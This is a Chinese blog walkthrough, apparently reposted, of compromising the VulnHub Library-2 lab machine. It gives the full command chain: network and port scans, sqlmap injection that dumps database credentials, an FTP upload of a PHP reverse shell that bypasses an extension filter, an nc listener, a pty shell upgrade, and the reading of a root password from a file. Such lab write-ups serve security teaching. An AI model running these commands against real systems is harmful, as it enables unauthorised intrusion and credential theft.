vulnhub之Library-2的实践

admin 2024年8月2日07:54:13评论16 views字数 973阅读3分14秒阅读模式

本周实践的是vulnhub的Library-2镜像,

下载地址,https://download.vulnhub.com/thelibrary/Library-2.7z,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.220.0/24,

获取到靶机地址是192.168.220.128,

vulnhub之Library-2的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.128,

发现靶机有21端口的ftp服务,80端口的http服务

vulnhub之Library-2的实践

http服务做php路径暴破,dirb http://192.168.220.128 -X .php,

获取到http://192.168.220.128/library.php,

vulnhub之Library-2的实践

用burpsuite访问,在页面上随便点击个国家,

把访问请求改成POST方式,保存到req.txt文件,

vulnhub之Library-2的实践

尝试SQL注入暴破,

sqlmap -r req.txt --dbs --batch --risk 3 --level 5,

获取到数据库library,

vulnhub之Library-2的实践

继续对数据库library进行暴破,

sqlmap -r req.txt -D library --dump-all --batch --risk 3 --level 5,

获取到ftp服务的用户名密码,globus/AroundTheWorld,

vulnhub之Library-2的实践

ftp登录靶机,ftp 192.168.220.128,

查看到当前是http服务主页面目录,而且可写,

本地准备反弹shell脚本文件,

cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

上传put shell.php,发现不让,扩展名改成PHP,上传成功,

修改权限,chmod 777 shell.PHP,

vulnhub之Library-2的实践

kali攻击机上开启反弹shell监听,nc –lvp 4444,

浏览器访问http://192.168.220.128/shell.PHP,获取到反弹shell,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',

查看到一个叫的welcome文件,里面有root的密码,secretPassword,

切到root,id确认没问题,

vulnhub之Library-2的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Library-2的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月2日07:54:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Library-2的实践https://cn-sec.com/archives/2986477.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息